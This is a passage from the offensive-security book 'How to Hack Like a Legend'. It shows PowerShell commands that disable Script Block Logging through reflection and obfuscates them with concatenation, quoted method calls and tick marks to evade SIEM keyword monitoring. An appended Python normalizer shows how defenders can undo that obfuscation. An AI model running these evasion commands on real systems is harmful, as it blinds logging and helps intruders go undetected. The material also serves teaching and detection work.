How to Hack Like a Legend by Sparc Flow

Author: Sparc Flow
Language: eng
Format: epub
Publisher: No Starch Press
Published: 2022-10-18T00:00:00+00:00


We need to disguise these terms while making sure they’re still usable. NonPublic and ScriptBlockLogging are simple strings, so we can use classic concatenation techniques to prevent detection. Let’s revisit the previous commands that disable Script Block Logging. 'NonPublic,Static' becomes 'No'+'nPublic,Static' and 'EnableScriptBlockLogging' becomes 'EnableScriptBloc'+'kLogging':

PS C:\Lab> $dict = $utils.GetField('cachedGroupPolicySettings', 'No'+'nPublic,Static')
PS C:\Lab> $key = "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBl"+"ockLogging"
PS C:\Lab> $dict.getValue("")[$key]['EnableScriptBloc'+'kLogging']=0

We’ve managed to hide two strings out of three, but what about the GetField method? You’d be surprised by the flexibility offered by PowerShell’s syntax. We can enclose a method call in double or single quotes, and it will still work perfectly fine:

..."GetField"('cachedGroupPolicySettings', 'No'+'nPublic,Static')

Oh, but look at that! Now GetField is a string, so we can apply classic concatenation techniques again, with extra parentheses added to make sure the concatenation occurs first:

...("Ge"+"tField")('cachedGroupPolicySettings', 'No'+'nPublic,Static')

Now for the grand finale, the cherry on top of this obfuscation awesomeness: we can add tick marks (`) inside strings and they will be ignored, meaning the command will still execute normally. The only constraint is that you shouldn’t use the tick mark before the characters 0, a, b, f, n, r, t, or v, lest they be interpreted as the special characters null, alert, backspace, form feed, newline, carriage return, horizontal tab, and vertical tab, respectively. Here we add a tick mark before the letter “i” in GetField:

...("Ge"+"tF`ield")('cachedGroupPolicySettings', 'No'+'nPublic,Static')

The special characters just mentioned are case-sensitive, so nothing forbids us from placing a tick mark in front of an uppercase F, for instance:

...("Ge"+"t`F`ield")('cachedGroupPolicySettings', 'No'+'nPublic,Static')

The final Script Block Logging code now looks like the following:

PS C:\Lab> $utils = [ref].Assembly.GetType('System.Management.Automation.Utils')
PS C:\Lab> $dict = $utils.("Ge"+"t`F`ield")('cachedGroupPolicySettings', 'NonP'+'ublic,Static')
PS C:\Lab> $key = "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptBl"+"ockLogging"
PS C:\Lab> $dict.getValue("")[$key]['EnableS'+'criptBlockLogging'] = 0

When we run these commands in our test lab, each one gets logged as expected, but they are all categorized as Verbose rather than a full-on Warning (Figure 8-4) and thus drown among the thousand other meaningless Verbose messages. What’s more, the obfuscation techniques we’ve applied will likely bypass any keyword monitoring performed by QRadar.

Figure 8-4: The obfuscation techniques bypass keyword monitoring, and our attack blends into the sea of Verbose logs.
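As an added defender-side example (not from the book, and not a description of how QRadar works internally), the Python normalizer below undoes the three tricks described above before keyword matching: it drops tick marks that form no real escape sequence, collapses 'a'+'b' string concatenations, and unquotes .("Method")( calls. The sample script block and the keyword list are constructed from the commands above; a SIEM or log forwarder would run the same normalization over the ScriptBlockText of each 4104 event before applying keyword rules.

```python
import re

# PowerShell only gives a backtick meaning before these (lowercase) characters;
# anywhere else the tick is silently dropped, which the obfuscation relies on.
PS_ESCAPE_CHARS = set("0abfnrtv")

# Indicators taken from the commands in the text; matched after normalization.
KEYWORDS = ["ScriptBlockLogging", "cachedGroupPolicySettings", "NonPublic,Static"]

_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
_QUOTED_METHOD = re.compile(r"""\.\(?(['"])(\w+)\1\)?\(""")

def strip_ticks(s: str) -> str:
    """Drop backticks that do not start a real escape sequence (`0 `a `b ...)."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "`" and i + 1 < len(s):
            nxt = s[i + 1]
            out.append("`" + nxt if nxt in PS_ESCAPE_CHARS else nxt)
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)

def normalize(script: str) -> str:
    """Undo tick insertion, 'a'+'b' concatenation and .("Method")( quoting."""
    s = strip_ticks(script)
    prev = None
    while prev != s:  # repeat so 'a'+'b'+'c' chains collapse fully
        prev = s
        s = _CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), s)
    return _QUOTED_METHOD.sub(r".\2(", s)

def matched_keywords(script: str) -> list:
    """Keywords found in the normalized script block (case-insensitive)."""
    norm = normalize(script).lower()
    return [k for k in KEYWORDS if k.lower() in norm]

# Constructed sample: the obfuscated script block text from the commands above,
# as it would appear in the ScriptBlockText of a 4104 event.
SAMPLE = "\n".join([
    "$dict = $utils.(\"Ge\"+\"t`F`ield\")('cachedGroupPolicySettings', 'NonP'+'ublic,Static')",
    "$key = \"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBl\"+\"ockLogging\"",
    "$dict.getValue(\"\")[$key]['EnableS'+'criptBlockLogging'] = 0",
])

if __name__ == "__main__":
    print("raw keyword hits:       ", [k for k in KEYWORDS if k.lower() in SAMPLE.lower()])
    print("normalized keyword hits:", matched_keywords(SAMPLE))
```

Raw matching on the sample catches only cachedGroupPolicySettings, which the commands never obfuscate; after normalization all three keywords match.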
